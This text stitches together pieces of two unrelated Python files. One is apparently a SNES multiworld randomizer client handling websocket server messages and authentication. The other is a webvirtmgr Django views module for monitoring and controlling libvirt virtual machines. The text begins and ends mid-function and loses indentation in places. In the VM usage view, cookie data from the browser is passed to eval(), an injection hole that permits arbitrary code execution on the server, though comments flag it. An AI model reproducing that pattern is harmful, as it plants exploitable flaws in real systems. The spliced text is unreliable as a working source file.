cmd += bytes([byte])
cmd += b'\x8F' # STA.l
cmd += bytes([ptr & 0xFF, (ptr >> 8) & 0xFF, (ptr >> 16) & 0xFF])
cmd += b'\xA9\x00\x8F\x00\x2C\x00\x68\xEB\x68\x28\x6C\xEA\xFF\x08'
PutAddress_Request['Space'] = 'CMD'
PutAddress_Request['Operands'] = ["2C00", hex(len(cmd)-1)[2:], "2C00", "1"]
try:
if ctx.snes_socket is not None:
await ctx.snes_socket.send(json.dumps(PutAddress_Request))
if ctx.snes_socket is not None:
await ctx.snes_socket.send(cmd)
except websockets.ConnectionClosed:
return False
else:
PutAddress_Request['Space'] = 'SNES'
try:
#will pack those requests as soon as qusb2snes actually supports that for real
for address, data in write_list:
PutAddress_Request['Operands'] = [hex(address)[2:], hex(len(data))[2:]]
if ctx.snes_socket is not None:
await ctx.snes_socket.send(json.dumps(PutAddress_Request))
if ctx.snes_socket is not None:
await ctx.snes_socket.send(data)
except websockets.ConnectionClosed:
return False
return True
finally:
ctx.snes_request_lock.release()
def snes_buffered_write(ctx : Context, address, data):
    """Queue a SNES write, coalescing it with the previous entry when the
    two address ranges are contiguous (cuts down on round-trips at flush)."""
    buffer = ctx.snes_write_buffer
    if buffer:
        last_address, last_data = buffer[-1]
        if last_address + len(last_data) == address:
            # new write starts exactly where the previous one ends: merge
            buffer[-1] = (last_address, last_data + data)
            return
    buffer.append((address, data))
async def snes_flush_writes(ctx : Context):
    """Send all buffered writes to the SNES and empty the buffer.

    The buffer is swapped out *before* awaiting `snes_write`: the original
    cleared it afterwards, so any write buffered while the await was in
    flight was silently discarded, and a concurrent flush could send the
    same writes twice.
    """
    if not ctx.snes_write_buffer:
        return
    # detach the pending writes first, then send the detached copy
    writes = ctx.snes_write_buffer
    ctx.snes_write_buffer = []
    await snes_write(ctx, writes)
async def send_msgs(websocket, msgs):
    """JSON-encode *msgs* and send them over *websocket*; no-op when the
    socket is absent or not currently usable."""
    usable = websocket and websocket.open and not websocket.closed
    if not usable:
        return
    payload = json.dumps(msgs)
    await websocket.send(payload)
async def server_loop(ctx: Context, address=None):
    """Connect to a multiworld server and pump its messages until disconnect.

    Resolution order for the address: explicit argument, then
    ``ctx.server_address``, then a cached per-ROM entry from persistent
    storage. On any exit the connection state is torn down and, if an
    address is still configured, an auto-reconnect task is scheduled.
    """
    ctx.ui_node.send_connection_status(ctx)
    cached_address = None
    if ctx.server and ctx.server.socket:
        ctx.ui_node.log_error('Already connected')
        return

    if address is None:  # set through CLI or BMBP
        address = ctx.server_address

    if address is None:  # see if this is an old connection
        await asyncio.sleep(0.5)  # wait for snes connection to succeed if possible.
        # the cached-servers dict is keyed by ROM name so each seed can
        # remember its own server; "default" is the fallback key
        rom = "".join(chr(x) for x in ctx.rom) if ctx.rom is not None else None
        try:
            servers = cached_address = Utils.persistent_load()["servers"]
            address = servers[rom] if rom is not None and rom in servers else servers["default"]
        except Exception as e:
            logging.debug(f"Could not find cached server address. {e}")

    # Wait for the user to provide a multiworld server address
    if not address:
        logging.info('Please connect to a multiworld server.')
        ctx.ui_node.poll_for_server_ip()
        return

    address = f"ws://{address}" if "://" not in address else address
    port = urllib.parse.urlparse(address).port or 38281  # default multiworld port

    ctx.ui_node.log_info('Connecting to multiworld server at %s' % address)
    try:
        socket = await websockets.connect(address, port=port, ping_timeout=None, ping_interval=None)
        ctx.server = Endpoint(socket)
        ctx.ui_node.log_info('Connected')
        ctx.server_address = address
        ctx.ui_node.send_connection_status(ctx)
        # message pump: each frame is a JSON list of [cmd, args] pairs
        async for data in ctx.server.socket:
            for msg in json.loads(data):
                cmd, args = (msg[0], msg[1]) if len(msg) > 1 else (msg, None)
                await process_server_cmd(ctx, cmd, args)
        ctx.ui_node.log_warning('Disconnected from multiworld server, type /connect to reconnect')
    except WebUI.WaitingForUiException:
        # benign: the web UI is prompting the user for input
        pass
    except ConnectionRefusedError:
        if cached_address:
            ctx.ui_node.log_error('Unable to connect to multiworld server at cached address. '
                                  'Please use the connect button above.')
        else:
            ctx.ui_node.log_error('Connection refused by the multiworld server')
    except (OSError, websockets.InvalidURI):
        ctx.ui_node.log_error('Failed to connect to the multiworld server')
    except Exception as e:
        ctx.ui_node.log_error('Lost connection to the multiworld server, type /connect to reconnect')
        if not isinstance(e, websockets.WebSocketException):
            logging.exception(e)
    finally:
        # full teardown of per-connection state, whatever the exit path
        ctx.awaiting_rom = False
        ctx.auth = None
        ctx.items_received = []
        ctx.locations_info = {}
        ctx.server_version = (0, 0, 0)
        if ctx.server and ctx.server.socket is not None:
            await ctx.server.socket.close()
        ctx.server = None
        ctx.server_task = None
        if ctx.server_address:
            # an address is still configured -> user wants to stay connected
            ctx.ui_node.log_info(f"... reconnecting in {RECONNECT_DELAY}s")
            ctx.ui_node.send_connection_status(ctx)
            asyncio.create_task(server_autoreconnect(ctx))
async def server_autoreconnect(ctx: Context):
    """Wait out the reconnect delay, then restart server_loop if still wanted.

    A progress-bar countdown was tried here but is disabled; see
    https://github.com/prompt-toolkit/python-prompt-toolkit/issues/1033
    """
    await asyncio.sleep(RECONNECT_DELAY)
    # only reconnect when an address is still configured and no other
    # server task has been started in the meantime
    wanted = bool(ctx.server_address) and ctx.server_task is None
    if wanted:
        ctx.server_task = asyncio.create_task(server_loop(ctx))
async def process_server_cmd(ctx: Context, cmd, args):
    """Dispatch one server command to the matching handler.

    Fix: the 'InvalidPassword' branch contained the placeholder
    ``ctx.password = <PASSWORD>`` (a syntax error, apparently a redaction
    artifact); the intended behavior is to clear the rejected password so
    ``server_auth`` prompts for a new one.

    Raises Exception from the 'ConnectionRefused' branch so the caller's
    generic handler logs and tears down the connection.
    """
    if cmd == 'RoomInfo':
        ctx.ui_node.log_info('--------------------------------')
        ctx.ui_node.log_info('Room Information:')
        ctx.ui_node.log_info('--------------------------------')
        version = args.get("version", "unknown Bonta Protocol")
        if isinstance(version, list):
            ctx.server_version = tuple(version)
            version = ".".join(str(item) for item in version)
        else:
            ctx.server_version = (0, 0, 0)
        ctx.ui_node.log_info(f'Server protocol version: {version}')
        if "tags" in args:
            ctx.ui_node.log_info("Server protocol tags: " + ", ".join(args["tags"]))
        if args['password']:
            ctx.ui_node.log_info('Password required')
        if "forfeit_mode" in args:  # could also be version > 2.2.1, but going with implicit content here
            logging.info("Forfeit setting: "+args["forfeit_mode"])
            logging.info("Remaining setting: "+args["remaining_mode"])
            logging.info(f"A !hint costs {args['hint_cost']} points and you get {args['location_check_points']}"
                         f" for each location checked.")
            ctx.hint_cost = int(args['hint_cost'])
            ctx.check_points = int(args['location_check_points'])
            ctx.forfeit_mode = args['forfeit_mode']
            ctx.remaining_mode = args['remaining_mode']
            ctx.ui_node.send_game_info(ctx)
        if len(args['players']) < 1:
            ctx.ui_node.log_info('No player connected')
        else:
            args['players'].sort()
            current_team = -1
            ctx.ui_node.log_info('Connected players:')
            for team, slot, name in args['players']:
                if team != current_team:
                    ctx.ui_node.log_info(f'  Team #{team + 1}')
                    current_team = team
                ctx.ui_node.log_info('    %s (Player %d)' % (name, slot))
        await server_auth(ctx, args['password'])

    elif cmd == 'ConnectionRefused':
        if 'InvalidPassword' in args:
            ctx.ui_node.log_error('Invalid password')
            # clear the rejected password so server_auth re-prompts
            ctx.password = None
            await server_auth(ctx, True)
        if 'InvalidRom' in args:
            if ctx.snes_socket is not None and not ctx.snes_socket.closed:
                asyncio.create_task(ctx.snes_socket.close())
            raise Exception(
                'Invalid ROM detected, please verify that you have loaded the correct rom and reconnect your snes (/snes)')
        if 'SlotAlreadyTaken' in args:
            # remember this server anyway so a later retry can reuse it
            Utils.persistent_store("servers", "default", ctx.server_address)
            Utils.persistent_store("servers", "".join(chr(x) for x in ctx.rom), ctx.server_address)
            raise Exception('Player slot already in use for that team')
        if 'IncompatibleVersion' in args:
            raise Exception('Server reported your client version as incompatible')
        raise Exception('Connection refused by the multiworld host')

    elif cmd == 'Connected':
        # cache the working server address per-ROM and globally
        Utils.persistent_store("servers", "default", ctx.server_address)
        Utils.persistent_store("servers", "".join(chr(x) for x in ctx.rom), ctx.server_address)
        ctx.team, ctx.slot = args[0]
        ctx.player_names = {p: n for p, n in args[1]}
        # resync anything checked/scouted while we were offline
        msgs = []
        if ctx.locations_checked:
            msgs.append(['LocationChecks', [Regions.location_table[loc][0] for loc in ctx.locations_checked]])
        if ctx.locations_scouted:
            msgs.append(['LocationScouts', list(ctx.locations_scouted)])
        if msgs:
            await ctx.send_msgs(msgs)
        if ctx.finished_game:
            await send_finished_game(ctx)

    elif cmd == 'ReceivedItems':
        start_index, items = args
        if start_index == 0:
            ctx.items_received = []
        elif start_index != len(ctx.items_received):
            # out of sync with the server: request a full resend
            sync_msg = [['Sync']]
            if ctx.locations_checked:
                sync_msg.append(['LocationChecks', [Regions.location_table[loc][0] for loc in ctx.locations_checked]])
            await ctx.send_msgs(sync_msg)
        if start_index == len(ctx.items_received):
            for item in items:
                ctx.items_received.append(ReceivedItem(*item))
        ctx.watcher_event.set()

    elif cmd == 'LocationInfo':
        for location, item, player in args:
            if location not in ctx.locations_info:
                # compressed dungeon-item ids -> display names
                replacements = {0xA2: 'Small Key', 0x9D: 'Big Key', 0x8D: 'Compass', 0x7D: 'Map'}
                item_name = replacements.get(item, get_item_name_from_id(item))
                ctx.ui_node.log_info(
                    f"Saw {color(item_name, 'red', 'bold')} at {list(Regions.location_table.keys())[location - 1]}")
                ctx.locations_info[location] = (item, player)
        ctx.watcher_event.set()

    elif cmd == 'ItemSent':
        player_sent, location, player_recvd, item = args
        ctx.ui_node.notify_item_sent(ctx.player_names[player_sent], ctx.player_names[player_recvd],
                                     get_item_name_from_id(item), get_location_name_from_address(location),
                                     player_sent == ctx.slot, player_recvd == ctx.slot)
        item = color(get_item_name_from_id(item), 'cyan' if player_sent != ctx.slot else 'green')
        player_sent = color(ctx.player_names[player_sent], 'yellow' if player_sent != ctx.slot else 'magenta')
        player_recvd = color(ctx.player_names[player_recvd], 'yellow' if player_recvd != ctx.slot else 'magenta')
        logging.info(
            '%s sent %s to %s (%s)' % (player_sent, item, player_recvd, color(get_location_name_from_address(location),
                                                                              'blue_bg', 'white')))

    elif cmd == 'ItemFound':
        found = ReceivedItem(*args)
        ctx.ui_node.notify_item_found(ctx.player_names[found.player], get_item_name_from_id(found.item),
                                      get_location_name_from_address(found.location), found.player == ctx.slot)
        item = color(get_item_name_from_id(found.item), 'cyan' if found.player != ctx.slot else 'green')
        player_sent = color(ctx.player_names[found.player], 'yellow' if found.player != ctx.slot else 'magenta')
        logging.info('%s found %s (%s)' % (player_sent, item, color(get_location_name_from_address(found.location),
                                                                    'blue_bg', 'white')))

    elif cmd == 'Missing':
        if 'locations' in args:
            locations = json.loads(args['locations'])
            for location in locations:
                ctx.ui_node.log_info(f'Missing: {location}')
            ctx.ui_node.log_info(f'Found {len(locations)} missing location checks')

    elif cmd == 'Hint':
        hints = [Utils.Hint(*hint) for hint in args]
        for hint in hints:
            ctx.ui_node.send_hint(ctx.player_names[hint.finding_player], ctx.player_names[hint.receiving_player],
                                  get_item_name_from_id(hint.item), get_location_name_from_address(hint.location),
                                  hint.found, hint.finding_player == ctx.slot, hint.receiving_player == ctx.slot,
                                  hint.entrance if hint.entrance else None)
            item = color(get_item_name_from_id(hint.item), 'green' if hint.found else 'cyan')
            player_find = color(ctx.player_names[hint.finding_player],
                                'yellow' if hint.finding_player != ctx.slot else 'magenta')
            player_recvd = color(ctx.player_names[hint.receiving_player],
                                 'yellow' if hint.receiving_player != ctx.slot else 'magenta')
            text = f"[Hint]: {player_recvd}'s {item} is " \
                   f"at {color(get_location_name_from_address(hint.location), 'blue_bg', 'white')} " \
                   f"in {player_find}'s World"
            if hint.entrance:
                text += " at " + color(hint.entrance, 'white_bg', 'black')
            logging.info(text + (f". {color('(found)', 'green_bg', 'black')} " if hint.found else "."))

    elif cmd == "AliasUpdate":
        ctx.player_names = {p: n for p, n in args}

    elif cmd == 'Print':
        ctx.ui_node.log_info(args)

    elif cmd == 'HintPointUpdate':
        ctx.hint_points = args[0]

    else:
        logging.debug(f"unknown command {args}")
def get_tags(ctx: Context):
    """Return the capability tags this client advertises to the server."""
    # 'FoundItems' is only advertised when the user opted into it
    return ['Berserker', 'FoundItems'] if ctx.found_items else ['Berserker']
async def server_auth(ctx: Context, password_requested):
    """Authenticate against the multiworld server.

    Prompts for a password when one is required but not yet known, defers
    authentication until a ROM is available, then sends the Connect handshake.
    """
    if password_requested and not ctx.password:
        ctx.ui_node.log_info('Enter the password required to join this game:')
        ctx.password = await console_input(ctx)
    if ctx.rom is None:
        # no ROM yet: remember that auth is pending and bail out
        ctx.awaiting_rom = True
        ctx.ui_node.log_info('No ROM detected, awaiting snes connection to authenticate to the multiworld server (/snes)')
        return
    ctx.awaiting_rom = False
    ctx.auth = ctx.rom.copy()
    handshake = ['Connect', {
        'password': ctx.password, 'rom': ctx.auth, 'version': Utils._version_tuple, 'tags': get_tags(ctx),
        'uuid': Utils.get_unique_identifier()
    }]
    await ctx.send_msgs([handshake])
async def console_input(ctx : Context):
    """Request one line of user input and wait for it.

    Increments the pending-request counter (so the input loop knows a prompt
    is expected), then blocks until a line arrives on the input queue.
    """
    ctx.input_requests += 1
    return await ctx.input_queue.get()
async def connect(ctx: Context, address=None):
    """Drop any existing server connection, then start a fresh server_loop task."""
    await ctx.disconnect()
    ctx.server_task = asyncio.create_task(server_loop(ctx, address))
from MultiServer import CommandProcessor, mark_raw
class ClientCommandProcessor(CommandProcessor):
    def __init__(self, ctx: Context):
        # keep a handle on the shared client context for the command handlers
        self.ctx = ctx
    def output(self, text: str):
        """Route command output to the UI log instead of stdout."""
        self.ctx.ui_node.log_info(text)
    def _cmd_exit(self) -> bool:
        """Close connections and client"""
        # signal the main loop to shut everything down; True reports success
        self.ctx.exit_event.set()
        return True
    @mark_raw
    def _cmd_snes(self, snes_address: str = "") -> bool:
        """Connect to a snes. Optionally include network address of a snes to connect to, otherwise show available devices"""
        # clear any pending auto-reconnect target so this explicit request wins
        self.ctx.snes_reconnect_address = None
        asyncio.create_task(snes_connect(self.ctx, snes_address if snes_address else self.ctx.snes_address))
        return True
def _cmd_snes_close(self) -> bool:
| |
from string import letters, digits
from random import choice
from django.shortcuts import render_to_response
from django.http import HttpResponseRedirect, HttpResponse
from django.template import RequestContext
from django.utils.translation import ugettext_lazy as _
import json
from instance.models import Instance
from servers.models import Compute
from vrtManager.instance import wvmInstances, wvmInstance
from libvirt import libvirtError, VIR_DOMAIN_XML_SECURE
from webvirtmgr.settings import TIME_JS_REFRESH, QEMU_KEYMAPS
from shared.helpers import render
from Queue import Queue, Empty
from threading import Thread
class Worker(Thread):
    """Thread executing tasks from a given tasks queue.

    Fix: ``except Exception, e`` and ``print e`` are Python-2-only spellings;
    the rest of this module already uses the ``as`` form (``except
    libvirtError as err``), which works on Python 2.6+ and Python 3.
    """
    def __init__(self, tasks):
        # tasks: Queue of (func, args, kwargs) triples; the worker starts
        # immediately as a daemon so it never blocks interpreter exit
        Thread.__init__(self)
        self.tasks = tasks
        self.daemon = True
        self.start()

    def run(self):
        # Drain the queue; exit once it is observed empty.
        while not self.tasks.empty():
            try:
                func, args, kargs = self.tasks.get(False)
                try:
                    func(*args, **kargs)
                except Exception as e:
                    # best-effort pool: report and keep consuming
                    print(e)
                # count the task as done even if it failed, so join() returns
                self.tasks.task_done()
            except Empty:
                # another worker won the race for the last item
                pass
class WorkerPool:
    """Pool of threads consuming tasks from a shared queue."""

    def __init__(self, num_threads):
        # workers are spawned lazily in run_tasks, not here
        self.tasks = Queue()
        self.num_threads = num_threads

    def add_task(self, func, *args, **kargs):
        """Queue func(*args, **kargs) for later execution."""
        task = (func, args, kargs)
        self.tasks.put(task)

    def run_tasks(self):
        """Spawn the workers and block until every queued task completes."""
        for _worker_index in range(self.num_threads):
            Worker(self.tasks)
        self.tasks.join()
def instusage(request, host_id, vname):
    """
    Return instance usage (CPU, disk, network) as a JSON payload for the
    usage charts. Rolling 10-sample histories are round-tripped through
    cookies.

    Fixes over the original:
    - guard the `blk_usage`/`net_usage`/`cpu_usage` loops, which crashed
      with TypeError when a libvirtError left them as None;
    - guard the else-branch `networks`/`disks` loops, which are None when
      the connection itself failed (status is None);
    - narrow the two bare `except:` clauses to `except Exception:`.
    """
    cookies = {}
    datasets = {}
    datasets_rd = []
    datasets_wr = []
    json_blk = []
    cookie_blk = {}
    blk_error = False
    datasets_rx = []
    datasets_tx = []
    json_net = []
    cookie_net = {}
    net_error = False
    networks = None
    disks = None
    compute = Compute.objects.get(id=host_id)

    try:
        conn = wvmInstance(compute.hostname,
                           compute.login,
                           compute.password,
                           compute.type,
                           vname)
        status = conn.get_status()
        if status == 3 or status == 5:
            # paused/shut-off: no live counters, but device lists are needed
            # for the zeroed placeholder charts below
            networks = conn.get_net_device()
            disks = conn.get_disk_device()
    except libvirtError:
        status = None

    if status and status == 1:
        # domain is running: sample live counters
        try:
            blk_usage = conn.disk_usage()
            cpu_usage = conn.cpu_usage()
            net_usage = conn.net_usage()
            conn.close()
        except libvirtError:
            blk_usage = None
            cpu_usage = None
            net_usage = None

        # previous samples come back from the browser via cookies
        # NOTE(review): `request._cookies` is a private attribute; Django's
        # public API is `request.COOKIES` — confirm against the middleware
        # in use before changing.
        try:
            cookies['cpu'] = request._cookies['cpu']
        except KeyError:
            cookies['cpu'] = None
        try:
            cookies['hdd'] = request._cookies['hdd']
        except KeyError:
            cookies['hdd'] = None
        try:
            cookies['net'] = request._cookies['net']
        except KeyError:
            cookies['net'] = None

        if cookies['cpu'] == '{}' or not cookies['cpu'] or not cpu_usage:
            datasets['cpu'] = [0]
        else:
            # SECURITY: eval() on client-supplied cookie data can execute
            # arbitrary code; these histories should be stored as JSON and
            # parsed with json.loads instead.
            datasets['cpu'] = eval(cookies['cpu'])
        if len(datasets['cpu']) > 10:
            while datasets['cpu']:
                del datasets['cpu'][0]
                if len(datasets['cpu']) == 10:
                    break
        if cpu_usage:
            # guard: cpu_usage is None when the counter fetch failed above
            if len(datasets['cpu']) <= 9:
                datasets['cpu'].append(int(cpu_usage['cpu']))
            if len(datasets['cpu']) == 10:
                datasets['cpu'].append(int(cpu_usage['cpu']))
                del datasets['cpu'][0]
        cpu = {
            'labels': [""] * 10,
            'datasets': [
                {
                    "fillColor": "rgba(241,72,70,0.5)",
                    "strokeColor": "rgba(241,72,70,1)",
                    "pointColor": "rgba(241,72,70,1)",
                    "pointStrokeColor": "#fff",
                    "data": datasets['cpu']
                }
            ]
        }

        # per-device disk read/write histories (MiB)
        for blk in (blk_usage or []):
            if cookies['hdd'] == '{}' or not cookies['hdd'] or not blk_usage:
                datasets_wr.append(0)
                datasets_rd.append(0)
            else:
                # SECURITY: eval() on cookie data — see note above.
                datasets['hdd'] = eval(cookies['hdd'])
                try:
                    datasets_rd = datasets['hdd'][blk['dev']][0]
                    datasets_wr = datasets['hdd'][blk['dev']][1]
                except Exception:
                    # malformed/stale cookie: skip updating this device
                    blk_error = True
            if not blk_error:
                if len(datasets_rd) > 10:
                    while datasets_rd:
                        del datasets_rd[0]
                        if len(datasets_rd) == 10:
                            break
                if len(datasets_wr) > 10:
                    while datasets_wr:
                        del datasets_wr[0]
                        if len(datasets_wr) == 10:
                            break
                if len(datasets_rd) <= 9:
                    datasets_rd.append(int(blk['rd']) / 1048576)
                if len(datasets_rd) == 10:
                    datasets_rd.append(int(blk['rd']) / 1048576)
                    del datasets_rd[0]
                if len(datasets_wr) <= 9:
                    datasets_wr.append(int(blk['wr']) / 1048576)
                if len(datasets_wr) == 10:
                    datasets_wr.append(int(blk['wr']) / 1048576)
                    del datasets_wr[0]
            disk = {
                'labels': [""] * 10,
                'datasets': [
                    {
                        "fillColor": "rgba(83,191,189,0.5)",
                        "strokeColor": "rgba(83,191,189,1)",
                        "pointColor": "rgba(83,191,189,1)",
                        "pointStrokeColor": "#fff",
                        "data": datasets_rd
                    },
                    {
                        "fillColor": "rgba(249,134,33,0.5)",
                        "strokeColor": "rgba(249,134,33,1)",
                        "pointColor": "rgba(249,134,33,1)",
                        "pointStrokeColor": "#fff",
                        "data": datasets_wr
                    },
                ]
            }
            json_blk.append({'dev': blk['dev'], 'data': disk})
            cookie_blk[blk['dev']] = [datasets_rd, datasets_wr]

        # per-device network rx/tx histories (MiB)
        for net in (net_usage or []):
            if cookies['net'] == '{}' or not cookies['net'] or not net_usage:
                datasets_rx.append(0)
                datasets_tx.append(0)
            else:
                # SECURITY: eval() on cookie data — see note above.
                datasets['net'] = eval(cookies['net'])
                try:
                    datasets_rx = datasets['net'][net['dev']][0]
                    datasets_tx = datasets['net'][net['dev']][1]
                except Exception:
                    # malformed/stale cookie: skip updating this device
                    net_error = True
            if not net_error:
                if len(datasets_rx) > 10:
                    while datasets_rx:
                        del datasets_rx[0]
                        if len(datasets_rx) == 10:
                            break
                if len(datasets_tx) > 10:
                    while datasets_tx:
                        del datasets_tx[0]
                        if len(datasets_tx) == 10:
                            break
                if len(datasets_rx) <= 9:
                    datasets_rx.append(int(net['rx']) / 1048576)
                if len(datasets_rx) == 10:
                    datasets_rx.append(int(net['rx']) / 1048576)
                    del datasets_rx[0]
                if len(datasets_tx) <= 9:
                    datasets_tx.append(int(net['tx']) / 1048576)
                if len(datasets_tx) == 10:
                    datasets_tx.append(int(net['tx']) / 1048576)
                    del datasets_tx[0]
            network = {
                'labels': [""] * 10,
                'datasets': [
                    {
                        "fillColor": "rgba(83,191,189,0.5)",
                        "strokeColor": "rgba(83,191,189,1)",
                        "pointColor": "rgba(83,191,189,1)",
                        "pointStrokeColor": "#fff",
                        "data": datasets_rx
                    },
                    {
                        "fillColor": "rgba(151,187,205,0.5)",
                        "strokeColor": "rgba(151,187,205,1)",
                        "pointColor": "rgba(151,187,205,1)",
                        "pointStrokeColor": "#fff",
                        "data": datasets_tx
                    },
                ]
            }
            json_net.append({'dev': net['dev'], 'data': network})
            cookie_net[net['dev']] = [datasets_rx, datasets_tx]
        data = json.dumps({'status': status, 'cpu': cpu, 'hdd': json_blk, 'net': json_net})
    else:
        # domain not running (or connection failed): emit zeroed charts
        datasets = [0] * 10
        cpu = {
            'labels': [""] * 10,
            'datasets': [
                {
                    "fillColor": "rgba(241,72,70,0.5)",
                    "strokeColor": "rgba(241,72,70,1)",
                    "pointColor": "rgba(241,72,70,1)",
                    "pointStrokeColor": "#fff",
                    "data": datasets
                }
            ]
        }
        # guard: networks/disks are None when the connection itself failed
        for i, net in enumerate(networks or []):
            datasets_rx = [0] * 10
            datasets_tx = [0] * 10
            network = {
                'labels': [""] * 10,
                'datasets': [
                    {
                        "fillColor": "rgba(83,191,189,0.5)",
                        "strokeColor": "rgba(83,191,189,1)",
                        "pointColor": "rgba(83,191,189,1)",
                        "pointStrokeColor": "#fff",
                        "data": datasets_rx
                    },
                    {
                        "fillColor": "rgba(151,187,205,0.5)",
                        "strokeColor": "rgba(151,187,205,1)",
                        "pointColor": "rgba(151,187,205,1)",
                        "pointStrokeColor": "#fff",
                        "data": datasets_tx
                    },
                ]
            }
            json_net.append({'dev': i, 'data': network})
        for blk in (disks or []):
            datasets_wr = [0] * 10
            datasets_rd = [0] * 10
            disk = {
                'labels': [""] * 10,
                'datasets': [
                    {
                        "fillColor": "rgba(83,191,189,0.5)",
                        "strokeColor": "rgba(83,191,189,1)",
                        "pointColor": "rgba(83,191,189,1)",
                        "pointStrokeColor": "#fff",
                        "data": datasets_rd
                    },
                    {
                        "fillColor": "rgba(249,134,33,0.5)",
                        "strokeColor": "rgba(249,134,33,1)",
                        "pointColor": "rgba(249,134,33,1)",
                        "pointStrokeColor": "#fff",
                        "data": datasets_wr
                    },
                ]
            }
            json_blk.append({'dev': blk['dev'], 'data': disk})
        data = json.dumps({'status': status, 'cpu': cpu, 'hdd': json_blk, 'net': json_net})

    response = HttpResponse()
    response['Content-Type'] = "text/javascript"
    if status == 1:
        # persist the updated histories back to the browser
        response.cookies['cpu'] = datasets['cpu']
        response.cookies['hdd'] = cookie_blk
        response.cookies['net'] = cookie_net
    response.write(data)
    return response
def insts_status(request, host_id):
    """
    Instances block

    Return a JSON array describing every instance on the given hypervisor
    (name, status, memory, vcpu, uuid, host id, managed-save flag), served
    with a text/javascript content type for the dashboard's AJAX poller.
    Connection errors are collected in `errors` and yield an empty list
    instead of a server error.
    """
    errors = []
    instances = []
    # Pre-bind so the loop below is a no-op when the hypervisor is
    # unreachable; previously a libvirtError left `get_instances` unbound
    # and the `for` loop raised NameError.
    get_instances = []
    compute = Compute.objects.get(id=host_id)
    try:
        conn = wvmInstances(compute.hostname,
                            compute.login,
                            compute.password,
                            compute.type)
        get_instances = conn.get_instances()
    except libvirtError as err:
        errors.append(err)
    for instance in get_instances:
        instances.append({'name': instance,
                          'status': conn.get_instance_status(instance),
                          'memory': conn.get_instance_memory(instance),
                          'vcpu': conn.get_instance_vcpu(instance),
                          'uuid': conn.get_uuid(instance),
                          'host': host_id,
                          'dump': conn.get_instance_managed_save_image(instance)
                          })
    data = json.dumps(instances)
    response = HttpResponse()
    response['Content-Type'] = "text/javascript"
    response.write(data)
    return response
def instances(request, host_id):
    """
    Instances block

    List every instance on one hypervisor and handle the POST power
    actions (start / shutdown / destroy / suspend / resume / managed
    save / delete save image).  Each successful action redirects back to
    the same URL so a browser refresh cannot repeat it.  libvirt errors
    are collected in `errors` and shown by the template instead of
    raising.
    """
    errors = []
    instances = []
    # Polling interval (ms) for the template; passed out via locals().
    time_refresh = 8000
    get_instances = []
    conn = None
    compute = Compute.objects.get(id=host_id)
    try:
        conn = wvmInstances(compute.hostname,
                            compute.login,
                            compute.password,
                            compute.type)
    except libvirtError as err:
        errors.append(err)
    if conn:
        try:
            if request.method == 'POST':
                name = request.POST.get('name', '')
                if 'start' in request.POST:
                    conn.start(name)
                    return HttpResponseRedirect(request.get_full_path())
                if 'shutdown' in request.POST:
                    conn.shutdown(name)
                    return HttpResponseRedirect(request.get_full_path())
                if 'destroy' in request.POST:
                    # "destroy" here is libvirt's hard power-off, not deletion.
                    conn.force_shutdown(name)
                    return HttpResponseRedirect(request.get_full_path())
                if 'managedsave' in request.POST:
                    conn.managedsave(name)
                    return HttpResponseRedirect(request.get_full_path())
                if 'deletesaveimage' in request.POST:
                    conn.managed_save_remove(name)
                    return HttpResponseRedirect(request.get_full_path())
                if 'suspend' in request.POST:
                    conn.suspend(name)
                    return HttpResponseRedirect(request.get_full_path())
                if 'resume' in request.POST:
                    conn.resume(name)
                    return HttpResponseRedirect(request.get_full_path())
            conn.close()
            # NOTE(review): conn.close() runs before conn.get_instances()
            # and the per-instance conn.get_* calls below — confirm that
            # wvmInstances still answers after close(), or move close()
            # to the end of this block.
        except libvirtError as err:
            errors.append(err)
        get_instances = conn.get_instances()
        for instance in get_instances:
            try:
                inst = Instance.objects.get(compute_id=host_id, name=instance)
                uuid = inst.uuid
            except Instance.DoesNotExist:
                # First time this instance is seen: cache its UUID in the DB.
                uuid = conn.get_uuid(instance)
                inst = Instance(compute_id=host_id, name=instance, uuid=uuid)
                inst.save()
            # Per-instance connection for details the pooled wvmInstances
            # handle does not expose (description, disk devices).
            conn2 = wvmInstance(compute.hostname,
                                compute.login,
                                compute.password,
                                compute.type,
                                instance)
            instances.append({'name': instance,
                              'status': conn.get_instance_status(instance),
                              'uuid': uuid,
                              'memory': conn.get_instance_memory(instance),
                              'description': conn2.get_description(),
                              'vcpu': conn.get_instance_vcpu(instance),
                              'storage': conn2.get_disk_device(),
                              'has_managed_save_image': conn.get_instance_managed_save_image(instance)})
            conn2.close()
    # NOTE(review): `object` shadows the builtin; project-wide convention
    # here, kept for consistency.  `render` is the project's own helper
    # (payload, template, context, request), not django.shortcuts.render.
    object = {
        'response': {
            'instances': instances
        },
        'errors': [str(error) for error in errors]
    }
    return render(object, 'instances.html', locals(), request)
def instance_status(request):
    """Bulk instance-status endpoint.

    The request body is a JSON object mapping hypervisor id -> list of
    instance hostnames.  Hypervisors are queried in parallel (worker
    pool of up to 10), and each hypervisor's instances are themselves
    queried in parallel (up to 20 workers).  Unreachable instances are
    silently omitted.  Returns the project's `render` of
    ``{'response': {'machines': [...]}}`` with one entry per reachable
    instance (status, current memory, disks, vcpu, hostname,
    hypervisor_id).
    """
    payload = json.loads(request.body)
    machines = []

    def query_hypervisor(hostnames, host_id):
        # One dict per hypervisor; worker threads insert under distinct
        # keys, which is safe under the GIL.
        compute = Compute.objects.get(id=host_id)
        results = {}  # renamed from `object`, which shadowed the builtin

        def query_machine(hostname):
            try:
                conn = wvmInstance(compute.hostname,
                                   compute.login,
                                   compute.password,
                                   compute.type, hostname)
                results[hostname] = {
                    'status': conn.get_status(),
                    'cur_memory': conn.get_cur_memory(),
                    'disks': conn.get_disk_device(),
                    'vcpu': conn.get_vcpu()
                }
            except libvirtError:
                # Unreachable VM: leave it out of the results.  (The old
                # `status = None` here only set a dead local.)
                pass

        pool = WorkerPool(min(len(hostnames), 20))
        for hostname in hostnames:
            pool.add_task(query_machine, hostname)
        pool.run_tasks()
        for hostname, info in results.items():
            info['hostname'] = hostname
            info['hypervisor_id'] = host_id
            machines.append(info)

    # NOTE(review): an empty payload gives WorkerPool(0) — confirm the
    # pool tolerates zero workers.
    pool = WorkerPool(min(len(payload), 10))
    for host_id in payload:
        pool.add_task(query_hypervisor, payload[host_id], host_id)
    pool.run_tasks()
    return render({'response': {'machines': machines}}, 'instance.html', locals(), request)
def instance(request, host_id, vname):
errors = []
messages = []
time_refresh = TIME_JS_REFRESH
compute = Compute.objects.get(id=host_id)
computes = Compute.objects.all()
computes_count = len(computes)
keymaps = QEMU_KEYMAPS
try:
conn = wvmInstance(compute.hostname,
compute.login,
compute.password,
compute.type,
vname)
except libvirtError as err:
errors.append(err)
try:
